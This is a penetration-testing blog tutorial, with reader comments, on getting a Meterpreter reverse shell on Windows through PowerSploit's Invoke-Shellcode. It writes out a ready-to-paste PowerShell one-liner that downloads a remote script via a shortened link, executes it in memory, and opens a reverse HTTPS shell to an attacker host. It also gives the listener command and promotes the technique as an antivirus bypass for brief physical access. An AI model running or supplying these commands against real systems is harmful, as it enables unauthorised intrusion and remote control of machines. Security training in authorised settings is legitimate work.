PowerSploit: The Easiest Shell You’ll Ever Get
Sometimes you just want a shell. You don’t want to worry about compiling a binary, testing it against antivirus, figuring out how to upload it to the box and finally execute it. Maybe you are giving a demo of an awesome new Meterpreter post-exploitation module. Maybe you have less than a minute of physical access to a Windows kiosk machine and need a quick win. There are plenty of scenarios that end in a penetration tester gaining GUI access to a target machine through guessed or found RDP, ESX or VNC credentials. In those situations, the easiest way to get a Meterpreter shell without worrying about AV is with PowerSploit.
PowerSploit is a collection of security-related modules and functions written in PowerShell. PowerSploit is already in both BackTrack and Kali, and its code is utilized by other awesome tools like SET so you may already be using it! Many of the scripts in the project are extremely useful in post-exploitation in Windows environments. The PowerSploit project was started by Matt Graeber who is the author of the function we will use in this tutorial: Invoke-Shellcode.
In order for PowerSploit to work, the target machine must have PowerShell installed and internet access. The first step is for us to set up our handler on our attacker box. This is something we will likely do often, so let’s automated it with a really simple Python script:
To start the multi/handler and configure it for PowerSploit, we just run the script:
python StartListener.py 192.168.0.15 443
Now that our handler is ready, we can move on to executing our shell. The first thing I did to make the next step easier to type is shorten the github link to Invoke-Shellcode with bitly:
Next, we need to run two commands in a PowerShell prompt to get our Meterpreter shell. The first command will create a .Net WebClient Object to download the PowerSploit function and pass it to Invoke-Expression to put it into memory:
IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/14bZZ0c’)
Now we just need to make a call to the Invoke-Shellcode function with the relevant parameters from the listener:
Invoke-Shellcode –Payload windows/meterpreter/reverse_https –Lhost 192.168.0.15 –Lport 443 –Force
We can actually combine these commands to run a single command to execute our shell:
IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/14bZZ0c’); Invoke-Shellcode –Payload windows/meterpreter/reverse_https –Lhost 172.0.1.200 –Lport 443 –Force
Once we get the prompt back, we can safely close PowerShell because the ultra-useful Smart_Migrate Meterpreter script has safely landed us in a new process:
That is the easiest and most convenient AV-bypass I have ever seen! Just open PowerShell and type a command. Hopefully this post has shown you one way PowerSploit can make your life as a pen-tester easier. You can find more ways at my blog and by following me on twitter. Also, join me at Derbycon when I will talk about the Pass-the-Hash attack and some simple mitigations with Skip Duckwall and how to use PowerSploit and Windows tools to accomplish post-exploitation tasks without uploading binaries with Matt Graeber. I hope to see you all there!
-Chris
Share this article
Leave a Reply
Share This
Recent Posts
- Playing With the New Burp Suite REST API
- Burp Suite 2.0 Beta Review
- Attacking Palo Alto Networks PAN-OS ‘readSessionVarsFromFile()’
- GPG Errors While Updating Kali Linux
- Installing Kali NetHunter on HTC Nexus 9
Subscribe To Our Mailing List
The Ultimate Burp Suite Training Program
Learn Network Penetration Testing
Penetration Testing
Categories
- AWBS
- Burp Suite
- Definitions
- Forensics and Incident Response
- Information Gathering
- Metasploit
- Penetration Testing Tutorials
- Phishing
- Presentations
- Tools
- Web Applications
- Wireless
Uhhhhhhhhh…..
Why did you put your IP in that server start command? Cause…. That’s REALLY not secure.
*I think it should be “127.0.0.1 443” which is the local host address.
-McFlyAF
Hi,
Actually tried your trick, it did not work, -Payload doesn’t exist after reading raw shell code from github! maybe it changed ?
Something terrible may have just happened and you have no idea what because you
just arbitrarily download crap from the Internet and execute it.
At line:53 char:6
+ throw <<<< 'Something terrible may have just happened and you have no idea w
hat because you just arbitrarily download crap from the Internet and execute it
.'
+ CategoryInfo : OperationStopped: (Something terri…and execute
it.:String) [], RuntimeException
+ FullyQualifiedErrorId : Something terrible may have just happened and yo
u have no idea what because you just arbitrarily download crap from the In
ternet and execute it.
Really impresses me seeing someone use PowerShell for pen testing I just wish there were more people as this subject seems to be pretty scarce within the PowerShell community
Any more good resources you can recommend
I thought it was awesome that powershell will download a webpage and store it as a string that you could later execute so I wrote a quick script based off this. It will allow you to pick a url that a powershell script is held and then execute it. Or it will host a script on a basic ruby webserver that can either be http or https.
https://github.com/b00stfr3ak/fast_meterpreter